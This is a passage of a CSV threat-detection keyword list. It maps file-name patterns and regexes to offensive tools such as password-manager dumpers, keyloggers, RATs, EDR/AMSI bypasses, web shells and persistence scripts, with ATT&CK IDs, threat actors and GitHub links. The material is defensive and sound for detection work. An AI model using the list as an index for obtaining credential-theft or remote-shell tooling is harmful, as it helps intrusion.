assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17124" "*\passwarden\app\getCredspasswarden2.h*",".{0,1000}\\passwarden\\app\\getCredspasswarden2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17125" 
"*\password.lst*",".{0,1000}\\password\.lst.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","17126" "*\passwordboss\app\getCredspasswordbossapp1.h*",".{0,1000}\\passwordboss\\app\\getCredspasswordbossapp1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17127" "*\passwordboss\app\getCredspasswordbossapp2.h*",".{0,1000}\\passwordboss\\app\\getCredspasswordbossapp2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17128" "*\Passwordfiles.txt*",".{0,1000}\\Passwordfiles\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","17129" "*\passwords.doc*",".{0,1000}\\passwords\.doc.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17130" "*\Passwords.docx*",".{0,1000}\\Passwords\.docx.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","17131" "*\passwords.docx*",".{0,1000}\\passwords\.docx.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17132" "*\passwords.txt*",".{0,1000}\\passwords\.txt.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17133" "*\passwords.xls*",".{0,1000}\\passwords\.xls.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17134" "*\passwords.xlsx*",".{0,1000}\\passwords\.xlsx.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD 
Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","17135" "*\PasswordStealer.dll*",".{0,1000}\\PasswordStealer\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","17136" "*\patch_amsi.exe*",".{0,1000}\\patch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17137" "*\Patch_AMSI.py*",".{0,1000}\\Patch_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17138" "*\Patch_AMSI.vba*",".{0,1000}\\Patch_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17139" "*\patch_etw.exe*",".{0,1000}\\patch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - 
TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17140" "*\patch_exit.exe*",".{0,1000}\\patch_exit\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","17141" "*\PatchingAPI.cpp*",".{0,1000}\\PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","17142" "*\PatchingAPI.cpp*",".{0,1000}\\PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","17143" "*\PatchingAPI.exe*",".{0,1000}\\PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","17144" "*\path_traversal_dict.txt*",".{0,1000}\\path_traversal_dict\.txt.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - 
T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","17145" "*\payload.exe*",".{0,1000}\\payload\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17146" "*\payload.hta*",".{0,1000}\\payload\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","17147" "*\payload_placement.exe*",".{0,1000}\\payload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17148" "*\PayloadGen.ps1*",".{0,1000}\\PayloadGen\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","17149" 
"*\Payloads\*.bin*",".{0,1000}\\Payloads\\.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","17150" "*\payloadtests.py*",".{0,1000}\\payloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","17151" "*\pe2sh.exe*",".{0,1000}\\pe2sh\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","17179" "*\PEASS-ng*",".{0,1000}\\PEASS\-ng.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","17180" "*\peeping-client.exe*",".{0,1000}\\peeping\-client\.exe.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - 
TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","17181" "*\peeping-tom.exe*",".{0,1000}\\peeping\-tom\.exe.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","17182" "*\peeping-tom-main*",".{0,1000}\\peeping\-tom\-main.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","17183" "*\PerfExec.exe*",".{0,1000}\\PerfExec\.exe.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","17184" "*\Perfusion.cpp*",".{0,1000}\\Perfusion\.cpp.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17185" "*\Perfusion.exe*",".{0,1000}\\Perfusion\.exe.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions 
vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17186" "*\Perfusion.sln*",".{0,1000}\\Perfusion\.sln.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17187" "*\PerfusionDll.cpp*",".{0,1000}\\PerfusionDll\.cpp.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17188" "*\PerfusionDll.dll*",".{0,1000}\\PerfusionDll\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17189" "*\PerfusionDll.log*",".{0,1000}\\PerfusionDll\.log.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17190" 
"*\periscope_release_x64.exe*",".{0,1000}\\periscope_release_x64\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","N/A","N/A","9","","N/A","","","","17191" "*\Perl Web Shell by RST-GHC.pl*",".{0,1000}\\Perl\sWeb\sShell\sby\sRST\-GHC\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17192" "*\perlweb_shell.pl*",".{0,1000}\\perlweb_shell\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17193" "*\persist.vbs*",".{0,1000}\\persist\.vbs.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","17194" "*\persist_bitsadmin.py*",".{0,1000}\\persist_bitsadmin\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17195" "*\persist_cortana.py*",".{0,1000}\\persist_cortana\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","17196" "*\persist_cortana.py*",".{0,1000}\\persist_cortana\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17197" "*\persist_dll_explorer.py*",".{0,1000}\\persist_dll_explorer\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - 
T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17198" "*\persist_hkcu_run.py*",".{0,1000}\\persist_hkcu_run\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#registry","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17199" "*\persist_hklm_run.py*",".{0,1000}\\persist_hklm_run\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#registry","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17200" "*\persist_ifeo.py*",".{0,1000}\\persist_ifeo\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17201" "*\persist_mofcomp.py*",".{0,1000}\\persist_mofcomp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17202" "*\persist_people.py*",".{0,1000}\\persist_people\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","17203" "*\persist_people.py*",".{0,1000}\\persist_people\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17204" "*\persist_schtask.py*",".{0,1000}\\persist_schtask\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17205" "*\persist_startup_files.py*",".{0,1000}\\persist_startup_files\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17206" 
"*\persist_userinit.py*",".{0,1000}\\persist_userinit\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17207" "*\persist_wmic.py*",".{0,1000}\\persist_wmic\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17208" "*\Persiste.ps1*",".{0,1000}\\Persiste\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17209" "*\Persistence.exe*",".{0,1000}\\Persistence\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","17210" 
"*\Persistence.vbs*",".{0,1000}\\Persistence\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17211" "*\persistence\elevated\rid_hijack*",".{0,1000}\\persistence\\elevated\\rid_hijack.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","17212" "*\persistence_demos-master*",".{0,1000}\\persistence_demos\-master.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","17213" "*\PersistsMalware.cs*",".{0,1000}\\PersistsMalware\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","17214" 
"*\PersistViaScheduledTask.ahk*",".{0,1000}\\PersistViaScheduledTask\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","17215" "*\persit_linux.go*",".{0,1000}\\persit_linux\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","17216" 